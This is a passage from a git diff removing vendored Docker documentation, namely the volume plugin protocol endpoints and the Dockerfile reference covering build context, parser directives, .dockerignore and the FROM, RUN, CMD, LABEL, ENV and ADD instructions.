-A volume plugin makes use of the `-v`and `--volume-driver` flag on the `docker run` command.  The `-v` flag accepts a volume name and the `--volume-driver` flag a driver type, for example:
-
-    $ docker run -ti -v volumename:/data --volume-driver=flocker   busybox sh
-
-This command passes the `volumename` through to the volume plugin as a
-user-given name for the volume. The `volumename` must not begin with a `/`.
-
-By having the user specify a  `volumename`, a plugin can associate the volume
-with an external volume beyond the lifetime of a single container or container
-host. This can be used, for example, to move a stateful container from one
-server to another.
-
-By specifying a `volumedriver` in conjunction with a `volumename`, users can use plugins such as [Flocker](https://clusterhq.com/docker-plugin/) to manage volumes external to a single host, such as those on EBS.
-
-
-## Create a VolumeDriver
-
-The container creation endpoint (`/containers/create`) accepts a `VolumeDriver`
-field of type `string` allowing to specify the name of the driver. It's default
-value of `"local"` (the default driver for local volumes).
-
-## Volume plugin protocol
-
-If a plugin registers itself as a `VolumeDriver` when activated, then it is
-expected to provide writeable paths on the host filesystem for the Docker
-daemon to provide to containers to consume.
-
-The Docker daemon handles bind-mounting the provided paths into user
-containers.
-
-> **Note**: Volume plugins should *not* write data to the `/var/lib/docker/`
-> directory, including `/var/lib/docker/volumes`. The `/var/lib/docker/`
-> directory is reserved for Docker.
-
-### /VolumeDriver.Create
-
-**Request**:
-```json
-{
-    "Name": "volume_name",
-    "Opts": {}
-}
-```
-
-Instruct the plugin that the user wants to create a volume, given a user
-specified volume name.  The plugin does not need to actually manifest the
-volume on the filesystem yet (until Mount is called).
-Opts is a map of driver specific options passed through from the user request.
-
-**Response**:
-```json
-{
-    "Err": ""
-}
-```
-
-Respond with a string error if an error occurred.
-
-### /VolumeDriver.Remove
-
-**Request**:
-```json
-{
-    "Name": "volume_name"
-}
-```
-
-Delete the specified volume from disk. This request is issued when a user invokes `docker rm -v` to remove volumes associated with a container.
-
-**Response**:
-```json
-{
-    "Err": ""
-}
-```
-
-Respond with a string error if an error occurred.
-
-### /VolumeDriver.Mount
-
-**Request**:
-```json
-{
-    "Name": "volume_name",
-    "ID": "b87d7442095999a92b65b3d9691e697b61713829cc0ffd1bb72e4ccd51aa4d6c"
-}
-```
-
-Docker requires the plugin to provide a volume, given a user specified volume
-name. This is called once per container start. If the same volume_name is requested
-more than once, the plugin may need to keep track of each new mount request and provision
-at the first mount request and deprovision at the last corresponding unmount request.
-
-`ID` is a unique ID for the caller that is requesting the mount.
-
-**Response**:
-```json
-{
-    "Mountpoint": "/path/to/directory/on/host",
-    "Err": ""
-}
-```
-
-Respond with the path on the host filesystem where the volume has been made
-available, and/or a string error if an error occurred.
-
-### /VolumeDriver.Path
-
-**Request**:
-```json
-{
-    "Name": "volume_name"
-}
-```
-
-Docker needs reminding of the path to the volume on the host.
-
-**Response**:
-```json
-{
-    "Mountpoint": "/path/to/directory/on/host",
-    "Err": ""
-}
-```
-
-Respond with the path on the host filesystem where the volume has been made
-available, and/or a string error if an error occurred. `Mountpoint` is optional,
-however the plugin may be queried again later if one is not provided.
-
-### /VolumeDriver.Unmount
-
-**Request**:
-```json
-{
-    "Name": "volume_name",
-    "ID": "b87d7442095999a92b65b3d9691e697b61713829cc0ffd1bb72e4ccd51aa4d6c"
-}
-```
-
-Indication that Docker no longer is using the named volume. This is called once
-per container stop.  Plugin may deduce that it is safe to deprovision it at
-this point.
-
-`ID` is a unique ID for the caller that is requesting the mount.
-
-**Response**:
-```json
-{
-    "Err": ""
-}
-```
-
-Respond with a string error if an error occurred.
-
-
-### /VolumeDriver.Get
-
-**Request**:
-```json
-{
-    "Name": "volume_name"
-}
-```
-
-Get the volume info.
-
-
-**Response**:
-```json
-{
-  "Volume": {
-    "Name": "volume_name",
-    "Mountpoint": "/path/to/directory/on/host",
-    "Status": {}
-  },
-  "Err": ""
-}
-```
-
-Respond with a string error if an error occurred. `Mountpoint` and `Status` are
-optional.
-
-
-### /VolumeDriver.List
-
-**Request**:
-```json
-{}
-```
-
-Get the list of volumes registered with the plugin.
-
-**Response**:
-```json
-{
-  "Volumes": [
-    {
-      "Name": "volume_name",
-      "Mountpoint": "/path/to/directory/on/host"
-    }
-  ],
-  "Err": ""
-}
-```
-
-Respond with a string error if an error occurred. `Mountpoint` is optional.
-
-### /VolumeDriver.Capabilities
-
-**Request**:
-```json
-{}
-```
-
-Get the list of capabilities the driver supports.
-The driver is not required to implement this endpoint, however in such cases
-the default values will be taken.
-
-**Response**:
-```json
-{
-  "Capabilities": {
-    "Scope": "global"
-  }
-}
-```
-
-Supported scopes are `global` and `local`. Any other value in `Scope` will be
-ignored and assumed to be `local`. Scope allows cluster managers to handle the
-volume differently, for instance with a scope of `global`, the cluster manager
-knows it only needs to create the volume once instead of on every engine. More
-capabilities may be added in the future.
diff --git a/vendor/github.com/docker/docker/docs/reference/builder.md b/vendor/github.com/docker/docker/docs/reference/builder.md
deleted file mode 100644
index 6fa5a24150..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/builder.md
+++ /dev/null
@@ -1,1746 +0,0 @@
----
-title: "Dockerfile reference"
-description: "Dockerfiles use a simple DSL which allows you to automate the steps you would normally manually take to create an image."
-keywords: "builder, docker, Dockerfile, automation, image creation"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# Dockerfile reference
-
-Docker can build images automatically by reading the instructions from a
-`Dockerfile`. A `Dockerfile` is a text document that contains all the commands a
-user could call on the command line to assemble an image. Using `docker build`
-users can create an automated build that executes several command-line
-instructions in succession.
-
-This page describes the commands you can use in a `Dockerfile`. When you are
-done reading this page, refer to the [`Dockerfile` Best
-Practices](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/) for a tip-oriented guide.
-
-## Usage
-
-The [`docker build`](commandline/build.md) command builds an image from
-a `Dockerfile` and a *context*. The build's context is the files at a specified
-location `PATH` or `URL`. The `PATH` is a directory on your local filesystem.
-The `URL` is a Git repository location.
-
-A context is processed recursively. So, a `PATH` includes any subdirectories and
-the `URL` includes the repository and its submodules. A simple build command
-that uses the current directory as context:
-
-    $ docker build .
-    Sending build context to Docker daemon  6.51 MB
-    ...
-
-The build is run by the Docker daemon, not by the CLI. The first thing a build
-process does is send the entire context (recursively) to the daemon.  In most
-cases, it's best to start with an empty directory as context and keep your
-Dockerfile in that directory. Add only the files needed for building the
-Dockerfile.
-
->**Warning**: Do not use your root directory, `/`, as the `PATH` as it causes
->the build to transfer the entire contents of your hard drive to the Docker
->daemon.
-
-To use a file in the build context, the `Dockerfile` refers to the file specified
-in an instruction, for example,  a `COPY` instruction. To increase the build's
-performance, exclude files and directories by adding a `.dockerignore` file to
-the context directory.  For information about how to [create a `.dockerignore`
-file](#dockerignore-file) see the documentation on this page.
-
-Traditionally, the `Dockerfile` is called `Dockerfile` and located in the root
-of the context. You use the `-f` flag with `docker build` to point to a Dockerfile
-anywhere in your file system.
-
-    $ docker build -f /path/to/a/Dockerfile .
-
-You can specify a repository and tag at which to save the new image if
-the build succeeds:
-
-    $ docker build -t shykes/myapp .
-
-To tag the image into multiple repositories after the build,
-add multiple `-t` parameters when you run the `build` command:
-
-    $ docker build -t shykes/myapp:1.0.2 -t shykes/myapp:latest .
-
-Before the Docker daemon runs the instructions in the `Dockerfile`, it performs
-a preliminary validation of the `Dockerfile` and returns an error if the syntax is incorrect:
-
-    $ docker build -t test/myapp .
-    Sending build context to Docker daemon 2.048 kB
-    Error response from daemon: Unknown instruction: RUNCMD
-
-The Docker daemon runs the instructions in the `Dockerfile` one-by-one,
-committing the result of each instruction
-to a new image if necessary, before finally outputting the ID of your
-new image. The Docker daemon will automatically clean up the context you
-sent.
-
-Note that each instruction is run independently, and causes a new image
-to be created - so `RUN cd /tmp` will not have any effect on the next
-instructions.
-
-Whenever possible, Docker will re-use the intermediate images (cache),
-to accelerate the `docker build` process significantly. This is indicated by
-the `Using cache` message in the console output.
-(For more information, see the [Build cache section](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/#/build-cache)) in the
-`Dockerfile` best practices guide:
-
-    $ docker build -t svendowideit/ambassador .
-    Sending build context to Docker daemon 15.36 kB
-    Step 1/4 : FROM alpine:3.2
-     ---> 31f630c65071
-    Step 2/4 : MAINTAINER SvenDowideit@home.org.au
-     ---> Using cache
-     ---> 2a1c91448f5f
-    Step 3/4 : RUN apk update &&      apk add socat &&        rm -r /var/cache/
-     ---> Using cache
-     ---> 21ed6e7fbb73
-    Step 4/4 : CMD env | grep _TCP= | (sed 's/.*_PORT_\([0-9]*\)_TCP=tcp:\/\/\(.*\):\(.*\)/socat -t 100000000 TCP4-LISTEN:\1,fork,reuseaddr TCP4:\2:\3 \&/' && echo wait) | sh
-     ---> Using cache
-     ---> 7ea8aef582cc
-    Successfully built 7ea8aef582cc
-
-Build cache is only used from images that have a local parent chain. This means
-that these images were created by previous builds or the whole chain of images
-was loaded with `docker load`. If you wish to use build cache of a specific
-image you can specify it with `--cache-from` option. Images specified with
-`--cache-from` do not need to have a parent chain and may be pulled from other
-registries.
-
-When you're done with your build, you're ready to look into [*Pushing a
-repository to its registry*](https://docs.docker.com/engine/tutorials/dockerrepos/#/contributing-to-docker-hub).
-
-## Format
-
-Here is the format of the `Dockerfile`:
-
-```Dockerfile
-# Comment
-INSTRUCTION arguments
-```
-
-The instruction is not case-sensitive. However, convention is for them to
-be UPPERCASE to distinguish them from arguments more easily.
-
-
-Docker runs instructions in a `Dockerfile` in order. **The first
-instruction must be \`FROM\`** in order to specify the [*Base
-Image*](glossary.md#base-image) from which you are building.
-
-Docker treats lines that *begin* with `#` as a comment, unless the line is
-a valid [parser directive](#parser-directives). A `#` marker anywhere
-else in a line is treated as an argument. This allows statements like:
-
-```Dockerfile
-# Comment
-RUN echo 'we are running some # of cool things'
-```
-
-Line continuation characters are not supported in comments.
-
-## Parser directives
-
-Parser directives are optional, and affect the way in which subsequent lines
-in a `Dockerfile` are handled. Parser directives do not add layers to the build,
-and will not be shown as a build step. Parser directives are written as a
-special type of comment in the form `# directive=value`. A single directive
-may only be used once.
-
-Once a comment, empty line or builder instruction has been processed, Docker
-no longer looks for parser directives. Instead it treats anything formatted
-as a parser directive as a comment and does not attempt to validate if it might
-be a parser directive. Therefore, all parser directives must be at the very
-top of a `Dockerfile`.
-
-Parser directives are not case-sensitive. However, convention is for them to
-be lowercase. Convention is also to include a blank line following any
-parser directives. Line continuation characters are not supported in parser
-directives.
-
-Due to these rules, the following examples are all invalid:
-
-Invalid due to line continuation:
-
-```Dockerfile
-# direc \
-tive=value
-```
-
-Invalid due to appearing twice:
-
-```Dockerfile
-# directive=value1
-# directive=value2
-
-FROM ImageName
-```
-
-Treated as a comment due to appearing after a builder instruction:
-
-```Dockerfile
-FROM ImageName
-# directive=value
-```
-
-Treated as a comment due to appearing after a comment which is not a parser
-directive:
-
-```Dockerfile
-# About my dockerfile
-FROM ImageName
-# directive=value
-```
-
-The unknown directive is treated as a comment due to not being recognized. In
-addition, the known directive is treated as a comment due to appearing after
-a comment which is not a parser directive.
-
-```Dockerfile
-# unknowndirective=value
-# knowndirective=value
-```
-
-Non line-breaking whitespace is permitted in a parser directive. Hence, the
-following lines are all treated identically:
-
-```Dockerfile
-#directive=value
-# directive =value
-#	directive= value
-# directive = value
-#	  dIrEcTiVe=value
-```
-
-The following parser directive is supported:
-
-* `escape`
-
-## escape
-
-    # escape=\ (backslash)
-
-Or
-
-    # escape=` (backtick)
-
-The `escape` directive sets the character used to escape characters in a
-`Dockerfile`. If not specified, the default escape character is `\`.
-
-The escape character is used both to escape characters in a line, and to
-escape a newline. This allows a `Dockerfile` instruction to
-span multiple lines. Note that regardless of whether the `escape` parser
-directive is included in a `Dockerfile`, *escaping is not performed in
-a `RUN` command, except at the end of a line.*
-
-Setting the escape character to `` ` `` is especially useful on
-`Windows`, where `\` is the directory path separator. `` ` `` is consistent
-with [Windows PowerShell](https://technet.microsoft.com/en-us/library/hh847755.aspx).
-
-Consider the following example which would fail in a non-obvious way on
-`Windows`. The second `\` at the end of the second line would be interpreted as an
-escape for the newline, instead of a target of the escape from the first `\`.
-Similarly, the `\` at the end of the third line would, assuming it was actually
-handled as an instruction, cause it be treated as a line continuation. The result
-of this dockerfile is that second and third lines are considered a single
-instruction:
-
-```Dockerfile
-FROM microsoft/nanoserver
-COPY testfile.txt c:\\
-RUN dir c:\
-```
-
-Results in:
-
-    PS C:\John> docker build -t cmd .
-    Sending build context to Docker daemon 3.072 kB
-    Step 1/2 : FROM microsoft/nanoserver
-     ---> 22738ff49c6d
-    Step 2/2 : COPY testfile.txt c:\RUN dir c:
-    GetFileAttributesEx c:RUN: The system cannot find the file specified.
-    PS C:\John>
-
-One solution to the above would be to use `/` as the target of both the `COPY`
-instruction, and `dir`. However, this syntax is, at best, confusing as it is not
-natural for paths on `Windows`, and at worst, error prone as not all commands on
-`Windows` support `/` as the path separator.
-
-By adding the `escape` parser directive, the following `Dockerfile` succeeds as
-expected with the use of natural platform semantics for file paths on `Windows`:
-
-    # escape=`
-
-    FROM microsoft/nanoserver
-    COPY testfile.txt c:\
-    RUN dir c:\
-
-Results in:
-
-    PS C:\John> docker build -t succeeds --no-cache=true .
-    Sending build context to Docker daemon 3.072 kB
-    Step 1/3 : FROM microsoft/nanoserver
-     ---> 22738ff49c6d
-    Step 2/3 : COPY testfile.txt c:\
-     ---> 96655de338de
-    Removing intermediate container 4db9acbb1682
-    Step 3/3 : RUN dir c:\
-     ---> Running in a2c157f842f5
-     Volume in drive C has no label.
-     Volume Serial Number is 7E6D-E0F7
-    
-     Directory of c:\
-    
-    10/05/2016  05:04 PM             1,894 License.txt
-    10/05/2016  02:22 PM    <DIR>          Program Files
-    10/05/2016  02:14 PM    <DIR>          Program Files (x86)
-    10/28/2016  11:18 AM                62 testfile.txt
-    10/28/2016  11:20 AM    <DIR>          Users
-    10/28/2016  11:20 AM    <DIR>          Windows
-               2 File(s)          1,956 bytes
-               4 Dir(s)  21,259,096,064 bytes free
-     ---> 01c7f3bef04f
-    Removing intermediate container a2c157f842f5
-    Successfully built 01c7f3bef04f
-    PS C:\John>
-
-## Environment replacement
-
-Environment variables (declared with [the `ENV` statement](#env)) can also be
-used in certain instructions as variables to be interpreted by the
-`Dockerfile`. Escapes are also handled for including variable-like syntax
-into a statement literally.
-
-Environment variables are notated in the `Dockerfile` either with
-`$variable_name` or `${variable_name}`. They are treated equivalently and the
-brace syntax is typically used to address issues with variable names with no
-whitespace, like `${foo}_bar`.
-
-The `${variable_name}` syntax also supports a few of the standard `bash`
-modifiers as specified below:
-
-* `${variable:-word}` indicates that if `variable` is set then the result
-  will be that value. If `variable` is not set then `word` will be the result.
-* `${variable:+word}` indicates that if `variable` is set then `word` will be
-  the result, otherwise the result is the empty string.
-
-In all cases, `word` can be any string, including additional environment
-variables.
-
-Escaping is possible by adding a `\` before the variable: `\$foo` or `\${foo}`,
-for example, will translate to `$foo` and `${foo}` literals respectively.
-
-Example (parsed representation is displayed after the `#`):
-
-    FROM busybox
-    ENV foo /bar
-    WORKDIR ${foo}   # WORKDIR /bar
-    ADD . $foo       # ADD . /bar
-    COPY \$foo /quux # COPY $foo /quux
-
-Environment variables are supported by the following list of instructions in
-the `Dockerfile`:
-
-* `ADD`
-* `COPY`
-* `ENV`
-* `EXPOSE`
-* `LABEL`
-* `USER`
-* `WORKDIR`
-* `VOLUME`
-* `STOPSIGNAL`
-
-as well as:
-
-* `ONBUILD` (when combined with one of the supported instructions above)
-
-> **Note**:
-> prior to 1.4, `ONBUILD` instructions did **NOT** support environment
-> variable, even when combined with any of the instructions listed above.
-
-Environment variable substitution will use the same value for each variable
-throughout the entire command. In other words, in this example:
-
-    ENV abc=hello
-    ENV abc=bye def=$abc
-    ENV ghi=$abc
-
-will result in `def` having a value of `hello`, not `bye`. However,
-`ghi` will have a value of `bye` because it is not part of the same command
-that set `abc` to `bye`.
-
-## .dockerignore file
-
-Before the docker CLI sends the context to the docker daemon, it looks
-for a file named `.dockerignore` in the root directory of the context.
-If this file exists, the CLI modifies the context to exclude files and
-directories that match patterns in it.  This helps to avoid
-unnecessarily sending large or sensitive files and directories to the
-daemon and potentially adding them to images using `ADD` or `COPY`.
-
-The CLI interprets the `.dockerignore` file as a newline-separated
-list of patterns similar to the file globs of Unix shells.  For the
-purposes of matching, the root of the context is considered to be both
-the working and the root directory.  For example, the patterns
-`/foo/bar` and `foo/bar` both exclude a file or directory named `bar`
-in the `foo` subdirectory of `PATH` or in the root of the git
-repository located at `URL`.  Neither excludes anything else.
-
-If a line in `.dockerignore` file starts with `#` in column 1, then this line is
-considered as a comment and is ignored before interpreted by the CLI.
-
-Here is an example `.dockerignore` file:
-
-```
-# comment
-    */temp*
-    */*/temp*
-    temp?
-```
-
-This file causes the following build behavior:
-
-| Rule           | Behavior                                                                                                                                                                     |
-|----------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
-| `# comment`    | Ignored.                 |
-| `*/temp*`      | Exclude files and directories whose names start with `temp` in any immediate subdirectory of the root.  For example, the plain file `/somedir/temporary.txt` is excluded, as is the directory `/somedir/temp`.                 |
-| `*/*/temp*`    | Exclude files and directories starting with `temp` from any subdirectory that is two levels below the root. For example, `/somedir/subdir/temporary.txt` is excluded. |
-| `temp?`        | Exclude files and directories in the root directory whose names are a one-character extension of `temp`.  For example, `/tempa` and `/tempb` are excluded.
-
-
-Matching is done using Go's
-[filepath.Match](http://golang.org/pkg/path/filepath#Match) rules.  A
-preprocessing step removes leading and trailing whitespace and
-eliminates `.` and `..` elements using Go's
-[filepath.Clean](http://golang.org/pkg/path/filepath/#Clean).  Lines
-that are blank after preprocessing are ignored.
-
-Beyond Go's filepath.Match rules, Docker also supports a special
-wildcard string `**` that matches any number of directories (including
-zero). For example, `**/*.go` will exclude all files that end with `.go`
-that are found in all directories, including the root of the build context.
-
-Lines starting with `!` (exclamation mark) can be used to make exceptions
-to exclusions.  The following is an example `.dockerignore` file that
-uses this mechanism:
-
-```
-    *.md
-    !README.md
-```
-
-All markdown files *except* `README.md` are excluded from the context.
-
-The placement of `!` exception rules influences the behavior: the last
-line of the `.dockerignore` that matches a particular file determines
-whether it is included or excluded.  Consider the following example:
-
-```
-    *.md
-    !README*.md
-    README-secret.md
-```
-
-No markdown files are included in the context except README files other than
-`README-secret.md`.
-
-Now consider this example:
-
-```
-    *.md
-    README-secret.md
-    !README*.md
-```
-
-All of the README files are included.  The middle line has no effect because
-`!README*.md` matches `README-secret.md` and comes last.
-
-You can even use the `.dockerignore` file to exclude the `Dockerfile`
-and `.dockerignore` files.  These files are still sent to the daemon
-because it needs them to do its job.  But the `ADD` and `COPY` commands
-do not copy them to the image.
-
-Finally, you may want to specify which files to include in the
-context, rather than which to exclude. To achieve this, specify `*` as
-the first pattern, followed by one or more `!` exception patterns.
-
-**Note**: For historical reasons, the pattern `.` is ignored.
-
-## FROM
-
-    FROM <image>
-
-Or
-
-    FROM <image>:<tag>
-
-Or
-
-    FROM <image>@<digest>
-
-The `FROM` instruction sets the [*Base Image*](glossary.md#base-image)
-for subsequent instructions. As such, a valid `Dockerfile` must have `FROM` as
-its first instruction. The image can be any valid image – it is especially easy
-to start by **pulling an image** from the [*Public Repositories*](https://docs.docker.com/engine/tutorials/dockerrepos/).
-
-- `FROM` must be the first non-comment instruction in the `Dockerfile`.
-
-- `FROM` can appear multiple times within a single `Dockerfile` in order to create
-multiple images. Simply make a note of the last image ID output by the commit
-before each new `FROM` command.
-
-- The `tag` or `digest` values are optional. If you omit either of them, the builder
-assumes a `latest` by default. The builder returns an error if it cannot match
-the `tag` value.
-
-## RUN
-
-RUN has 2 forms:
-
-- `RUN <command>` (*shell* form, the command is run in a shell, which by
-default is `/bin/sh -c` on Linux or `cmd /S /C` on Windows)
-- `RUN ["executable", "param1", "param2"]` (*exec* form)
-
-The `RUN` instruction will execute any commands in a new layer on top of the
-current image and commit the results. The resulting committed image will be
-used for the next step in the `Dockerfile`.
-
-Layering `RUN` instructions and generating commits conforms to the core
-concepts of Docker where commits are cheap and containers can be created from
-any point in an image's history, much like source control.
-
-The *exec* form makes it possible to avoid shell string munging, and to `RUN`
-commands using a base image that does not contain the specified shell executable.
-
-The default shell for the *shell* form can be changed using the `SHELL`
-command.
-
-In the *shell* form you can use a `\` (backslash) to continue a single
-RUN instruction onto the next line. For example, consider these two lines:
-
-```
-RUN /bin/bash -c 'source $HOME/.bashrc; \
-echo $HOME'
-```
-Together they are equivalent to this single line:
-
-```
-RUN /bin/bash -c 'source $HOME/.bashrc; echo $HOME'
-```
-
-> **Note**:
-> To use a different shell, other than '/bin/sh', use the *exec* form
-> passing in the desired shell. For example,
-> `RUN ["/bin/bash", "-c", "echo hello"]`
-
-> **Note**:
-> The *exec* form is parsed as a JSON array, which means that
-> you must use double-quotes (") around words not single-quotes (').
-
-> **Note**:
-> Unlike the *shell* form, the *exec* form does not invoke a command shell.
-> This means that normal shell processing does not happen. For example,
-> `RUN [ "echo", "$HOME" ]` will not do variable substitution on `$HOME`.
-> If you want shell processing then either use the *shell* form or execute
-> a shell directly, for example: `RUN [ "sh", "-c", "echo $HOME" ]`.
-> When using the exec form and executing a shell directly, as in the case for
-> the shell form, it is the shell that is doing the environment variable
-> expansion, not docker.
->
-> **Note**:
-> In the *JSON* form, it is necessary to escape backslashes. This is
-> particularly relevant on Windows where the backslash is the path separator.
-> The following line would otherwise be treated as *shell* form due to not
-> being valid JSON, and fail in an unexpected way:
-> `RUN ["c:\windows\system32\tasklist.exe"]`
-> The correct syntax for this example is:
-> `RUN ["c:\\windows\\system32\\tasklist.exe"]`
-
-The cache for `RUN` instructions isn't invalidated automatically during
-the next build. The cache for an instruction like
-`RUN apt-get dist-upgrade -y` will be reused during the next build. The
-cache for `RUN` instructions can be invalidated by using the `--no-cache`
-flag, for example `docker build --no-cache`.
-
-See the [`Dockerfile` Best Practices
-guide](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/#/build-cache) for more information.
-
-The cache for `RUN` instructions can be invalidated by `ADD` instructions. See
-[below](#add) for details.
-
-### Known issues (RUN)
-
-- [Issue 783](https://github.com/docker/docker/issues/783) is about file
-  permissions problems that can occur when using the AUFS file system. You
-  might notice it during an attempt to `rm` a file, for example.
-
-  For systems that have recent aufs version (i.e., `dirperm1` mount option can
-  be set), docker will attempt to fix the issue automatically by mounting
-  the layers with `dirperm1` option. More details on `dirperm1` option can be
-  found at [`aufs` man page](https://github.com/sfjro/aufs3-linux/tree/aufs3.18/Documentation/filesystems/aufs)
-
-  If your system doesn't have support for `dirperm1`, the issue describes a workaround.
-
-## CMD
-
-The `CMD` instruction has three forms:
-
-- `CMD ["executable","param1","param2"]` (*exec* form, this is the preferred form)
-- `CMD ["param1","param2"]` (as *default parameters to ENTRYPOINT*)
-- `CMD command param1 param2` (*shell* form)
-
-There can only be one `CMD` instruction in a `Dockerfile`. If you list more than one `CMD`
-then only the last `CMD` will take effect.
-
-**The main purpose of a `CMD` is to provide defaults for an executing
-container.** These defaults can include an executable, or they can omit
-the executable, in which case you must specify an `ENTRYPOINT`
-instruction as well.
-
-> **Note**:
-> If `CMD` is used to provide default arguments for the `ENTRYPOINT`
-> instruction, both the `CMD` and `ENTRYPOINT` instructions should be specified
-> with the JSON array format.
-
-> **Note**:
-> The *exec* form is parsed as a JSON array, which means that
-> you must use double-quotes (") around words not single-quotes (').
-
-> **Note**:
-> Unlike the *shell* form, the *exec* form does not invoke a command shell.
-> This means that normal shell processing does not happen. For example,
-> `CMD [ "echo", "$HOME" ]` will not do variable substitution on `$HOME`.
-> If you want shell processing then either use the *shell* form or execute
-> a shell directly, for example: `CMD [ "sh", "-c", "echo $HOME" ]`.
-> When using the exec form and executing a shell directly, as in the case for
-> the shell form, it is the shell that is doing the environment variable
-> expansion, not docker.
-
-When used in the shell or exec formats, the `CMD` instruction sets the command
-to be executed when running the image.
-
-If you use the *shell* form of the `CMD`, then the `<command>` will execute in
-`/bin/sh -c`:
-
-    FROM ubuntu
-    CMD echo "This is a test." | wc -
-
-If you want to **run your** `<command>` **without a shell** then you must
-express the command as a JSON array and give the full path to the executable.
-**This array form is the preferred format of `CMD`.** Any additional parameters
-must be individually expressed as strings in the array:
-
-    FROM ubuntu
-    CMD ["/usr/bin/wc","--help"]
-
-If you would like your container to run the same executable every time, then
-you should consider using `ENTRYPOINT` in combination with `CMD`. See
-[*ENTRYPOINT*](#entrypoint).
-
-If the user specifies arguments to `docker run` then they will override the
-default specified in `CMD`.
-
-> **Note**:
-> Don't confuse `RUN` with `CMD`. `RUN` actually runs a command and commits
-> the result; `CMD` does not execute anything at build time, but specifies
-> the intended command for the image.
-
-## LABEL
-
-    LABEL <key>=<value> <key>=<value> <key>=<value> ...
-
-The `LABEL` instruction adds metadata to an image. A `LABEL` is a
-key-value pair. To include spaces within a `LABEL` value, use quotes and
-backslashes as you would in command-line parsing. A few usage examples:
-
-    LABEL "com.example.vendor"="ACME Incorporated"
-    LABEL com.example.label-with-value="foo"
-    LABEL version="1.0"
-    LABEL description="This text illustrates \
-    that label-values can span multiple lines."
-
-An image can have more than one label. To specify multiple labels,
-Docker recommends combining labels into a single `LABEL` instruction where
-possible. Each `LABEL` instruction produces a new layer which can result in an
-inefficient image if you use many labels. This example results in a single image
-layer.
-
-    LABEL multi.label1="value1" multi.label2="value2" other="value3"
-
-The above can also be written as:
-
-    LABEL multi.label1="value1" \
-          multi.label2="value2" \
-          other="value3"
-
-Labels are additive including `LABEL`s in `FROM` images. If Docker
-encounters a label/key that already exists, the new value overrides any previous
-labels with identical keys.
-
-To view an image's labels, use the `docker inspect` command.
-
-    "Labels": {
-        "com.example.vendor": "ACME Incorporated"
-        "com.example.label-with-value": "foo",
-        "version": "1.0",
-        "description": "This text illustrates that label-values can span multiple lines.",
-        "multi.label1": "value1",
-        "multi.label2": "value2",
-        "other": "value3"
-    },
-
-## MAINTAINER (deprecated)
-
-    MAINTAINER <name>
-
-The `MAINTAINER` instruction sets the *Author* field of the generated images.
-The `LABEL` instruction is a much more flexible version of this and you should use
-it instead, as it enables setting any metadata you require, and can be viewed
-easily, for example with `docker inspect`. To set a label corresponding to the
-`MAINTAINER` field you could use:
-
-    LABEL maintainer "SvenDowideit@home.org.au"
-
-This will then be visible from `docker inspect` with the other labels.
-
-## EXPOSE
-
-    EXPOSE <port> [<port>...]
-
-The `EXPOSE` instruction informs Docker that the container listens on the
-specified network ports at runtime. `EXPOSE` does not make the ports of the
-container accessible to the host. To do that, you must use either the `-p` flag
-to publish a range of ports or the `-P` flag to publish all of the exposed
-ports. You can expose one port number and publish it externally under another
-number.
-
-To set up port redirection on the host system, see [using the -P
-flag](run.md#expose-incoming-ports). The Docker network feature supports
-creating networks without the need to expose ports within the network, for
-detailed information see the  [overview of this
-feature](https://docs.docker.com/engine/userguide/networking/)).
-
-## ENV
-
-    ENV <key> <value>
-    ENV <key>=<value> ...
-
-The `ENV` instruction sets the environment variable `<key>` to the value
-`<value>`. This value will be in the environment of all "descendant"
-`Dockerfile` commands and can be [replaced inline](#environment-replacement) in
-many as well.
-
-The `ENV` instruction has two forms. The first form, `ENV <key> <value>`,
-will set a single variable to a value. The entire string after the first
-space will be treated as the `<value>` - including characters such as
-spaces and quotes.
-
-The second form, `ENV <key>=<value> ...`, allows for multiple variables to
-be set at one time. Notice that the second form uses the equals sign (=)
-in the syntax, while the first form does not. Like command line parsing,
-quotes and backslashes can be used to include spaces within values.
-
-For example:
-
-    ENV myName="John Doe" myDog=Rex\ The\ Dog \
-        myCat=fluffy
-
-and
-
-    ENV myName John Doe
-    ENV myDog Rex The Dog
-    ENV myCat fluffy
-
-will yield the same net results in the final image, but the first form
-is preferred because it produces a single cache layer.
-
-The environment variables set using `ENV` will persist when a container is run
-from the resulting image. You can view the values using `docker inspect`, and
-change them using `docker run --env <key>=<value>`.
-
-> **Note**:
-> Environment persistence can cause unexpected side effects. For example,
-> setting `ENV DEBIAN_FRONTEND noninteractive` may confuse apt-get
-> users on a Debian-based image. To set a value for a single command, use
-> `RUN <key>=<value> <command>`.
-
-## ADD
-
-ADD has two forms:
-
-- `ADD <src>... <dest>`
-- `ADD ["<src>",... "<dest>"]` (this form is required for paths containing
-whitespace)
-
-The `ADD` instruction copies new files, directories or remote file URLs from `<src>`
-and adds them to the filesystem of the image at the path `<dest>`.
-
-Multiple `<src>` resource may be specified but if they are files or
-directories then they must be relative to the source directory that is
-being built (the context of the build).
-
-Each `<src>` may contain wildcards and matching will be done using Go's
-[filepath.Match](http://golang.org/pkg/path/filepath#Match) rules. For example:
-
-    ADD hom* /mydir/        # adds all files starting with "hom"
-    ADD hom?.txt /mydir/    # ? is replaced with any single character, e.g., "home.txt"
-
-The `<dest>` is an absolute path, or a path relative to `WORKDIR`, into which
-the source will be copied inside the destination container.
-
-    ADD test relativeDir/          # adds "test" to `WORKDIR`/relativeDir/
-    ADD test /absoluteDir/         # adds "test" to /absoluteDir/
-
-All new files and directories are created with a UID and GID of 0.
-
-In the case where `<src>` is a remote file URL, the destination will
-have permissions of 600. If the remote file being retrieved has an HTTP
-`Last-Modified` header, the timestamp from that header will be used
-to set the `mtime` on the destination file. However, like any other file
-processed during an `ADD`, `mtime` will not be included in the determination
-of whether or not the file has changed and the cache should be updated.
-
-> **Note**:
-> If you build by passing a `Dockerfile` through STDIN (`docker
-> build - < somefile`), there is no build context, so the `Dockerfile`
-> can only contain a URL based `ADD` instruction. You can also pass a
-> compressed archive through STDIN: (`docker build - < archive.tar.gz`),
-> the `Dockerfile` at the root of the archive and the rest of the
-> archive will be used as the context of the build.
-
-> **Note**:
-> If your URL files are protected using authentication, you
